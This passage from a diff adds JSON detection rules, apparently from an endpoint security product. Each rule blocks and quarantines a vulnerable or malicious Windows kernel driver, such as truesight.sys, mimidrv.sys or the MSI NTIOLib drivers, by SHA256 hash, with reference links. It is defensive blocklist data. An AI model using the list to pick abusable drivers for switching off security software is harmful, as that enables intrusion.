"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982289Z", + "creation_date": "2026-03-23T11:45:29.982291Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982297Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7cc9ba2df7b9ea6bb17ee342898edd7f54703b93b6ded6a819e83a7ee9f938b4", + "comment": "Vulnerable Kernel Driver (aka SSPORT.sys) [https://www.loldrivers.io/drivers/c854b612-0b9f-4fc3-a7b8-a93bed7a291e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"ba510417-661d-50bf-827d-c10ffa880ee2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821503Z", + "creation_date": "2026-03-23T11:45:31.821505Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821511Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "83b05582efd8cc9bc6ecf5d93e4f86ea8c3e6aeca5bd1d77baa2954924493cb0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba5795e9-dddf-5fe9-bcab-66536ffb8f15", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474062Z", + "creation_date": "2026-03-23T11:45:30.474065Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.474074Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dadbd564c4fec1cb6a3e2be92031f22b1ddd19796d5d9639bffb927599c69a8d", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba5caa18-d697-58fe-807a-38def385a2e7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985814Z", + "creation_date": "2026-03-23T11:45:29.985816Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985821Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad938d15ecfd70083c474e1642a88b078c3cea02cdbddf66d4fb1c01b9b29d9a", + "comment": "Malicious Kernel Driver (aka NQrmq.sys) [https://www.virustotal.com/gui/file/ad938d15ecfd70083c474e1642a88b078c3cea02cdbddf66d4fb1c01b9b29d9a] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba5ee5c0-6a3f-55cb-81ce-3728252362d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614718Z", + "creation_date": "2026-03-23T11:45:29.614720Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614726Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9529efb1837b1005e5e8f477773752078e0a46500c748bc30c9b5084d04082e6", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba5f1ea8-cd37-5d52-9788-48abb875c686", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148660Z", + "creation_date": "2026-03-23T11:45:31.148661Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148667Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"356851d609ce4becafec5ea6fd7548d25d6cc9e711d03d2d6a6513a30480a0ee", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba6007ff-6a13-5571-b09a-d572966b0cc3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483891Z", + "creation_date": "2026-03-23T11:45:31.483895Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483903Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3e9f19cb357291cc073b6396ec5cea5093daa2d47332b44fed69d9b904c21dc5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba734b3c-b826-5902-abc9-344346ee150a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478125Z", + "creation_date": "2026-03-23T11:45:31.478129Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.478155Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9b6cc38c48e21cbb8320efaa3720e61521c35f9b1e2d6e28c081f1a9eff4bff3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba80a52f-815a-5fb3-8806-3467e244e7d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470371Z", + "creation_date": "2026-03-23T11:45:30.470375Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470383Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6c9f431814cd58365468ac63ba8b6693c3dd2a2b3ef37b23e5d80d75083b784d", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) 
[https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba82a4e1-36f8-5911-b96a-7c6eda84401d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821429Z", + "creation_date": "2026-03-23T11:45:31.821431Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821437Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8542409e3eed1df27f43d714d6b6851bb56627d089c173e331c81527f0c2de0b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba86d04e-c59c-5e3f-a520-e85ac1cfa5bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614921Z", + "creation_date": 
"2026-03-23T11:45:29.614923Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614928Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d0bd1ae72aeb5f3eabf1531a635f990e5eaae7fdd560342f915f723766c80889", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba8962cc-67c0-55c6-8471-db6ff24ea846", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820581Z", + "creation_date": "2026-03-23T11:45:30.820583Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820589Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8d3347c93dff62eecdde22ccc6ba3ce8c0446874738488527ea76d0645341409", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "baa2ad79-d2d2-5410-b99e-3bed74860950", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474321Z", + "creation_date": "2026-03-23T11:45:31.474325Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474334Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eb84b21bf29dd29ba121b45653c998984a3c39a8c9cfda04932aeb6d91cd77d7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "babeea83-195d-53a5-8939-98c1a7b677b4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478635Z", + "creation_date": "2026-03-23T11:45:30.478639Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.478648Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd628061d6e53f3f0b44f409ad914b3494c5d7b5ff6ff0e8fc3161aacec93e96", + "comment": "Vulnerable Kernel Driver (aka Tmel.sys) [https://www.loldrivers.io/drivers/1aeb1205-8b02-42b6-a563-b953ea337c19/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bac5b704-595a-5d81-a6c2-cf10fb1e9d68", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494619Z", + "creation_date": "2026-03-23T11:45:31.494621Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494627Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "04a3a31b33be0f29a9b291591db1a53dc8cbcd1a272c999f161f332acf93c7d6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bacd9290-5194-519b-8f8f-8975173b14d3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473203Z", + "creation_date": "2026-03-23T11:45:31.473208Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473218Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "25cd2b80f1440852e73b38aaefa23257d8f806eb7b1449d81cb6443e9b8fe39b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bad12054-2ab6-5c92-883c-d95f57c33db0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457216Z", + "creation_date": "2026-03-23T11:45:30.457219Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457229Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"afc1873543735d6299543d91d7c09ee1fa1588ff9f131ba4aedcd32b984c8ec1", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "badcf67a-2949-590f-8a34-cf6e75d3409a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492390Z", + "creation_date": "2026-03-23T11:45:31.492392Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492398Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "213ab0806c1ba92b72d59fdd90f9bb3bfe55611ac92d35ffbab172e5b1421dde", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bae1dfb8-a483-56fa-97f3-e4b784dac231", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976500Z", + "creation_date": "2026-03-23T11:45:29.976502Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976507Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9c31a9fbf833b732b5f3f06c31e200994a65ce187260e66eff62278660dba4ef", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bae3819f-dfd8-58c7-8bdb-5a0de63b03f7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454793Z", + "creation_date": "2026-03-23T11:45:30.454796Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454805Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f7d72d22cd4ad3e44fd617bdb4c90b9a884f4eb045688c0e3fb64dd33e033eaa", + "comment": "Vulnerable Kernel Driver (aka mhyprotrpg.Sys) [https://www.loldrivers.io/drivers/ebdde780-e142-44e7-a998-504c516f4695/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bae7bc1a-588b-537c-91b7-2abf3965733e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477260Z", + "creation_date": "2026-03-23T11:45:30.477263Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477272Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1228d0b6b4f907384346f64e918cc28021fe1cd7d4e39687bca34a708998261a", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "baea4a00-cf18-502b-bfac-52951b683e81", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984424Z", + "creation_date": "2026-03-23T11:45:29.984426Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984431Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d5cc046c2ae9ba6fe54def699f1c4fa92d3226304321bbf45cc33883ce131138", + "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "baf0918f-bea7-5fbf-9977-5e13671583b7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612915Z", + "creation_date": "2026-03-23T11:45:29.612917Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612922Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0483b32f9544e9c3cc3f206e7bc983ea83f5a9ca44864f2af9b8fc10ff45949f", + "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb01abf2-b845-5e38-9a8b-29b3b3fb87a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459104Z", + "creation_date": "2026-03-23T11:45:30.459107Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459114Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65a3e69854c729659281d2c5f8a4c8274ad3606befdcd9e1b79d3262f260bfa1", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb01e362-6e05-5e46-aa7f-ead50304ebf3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975360Z", + "creation_date": "2026-03-23T11:45:29.975362Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975368Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
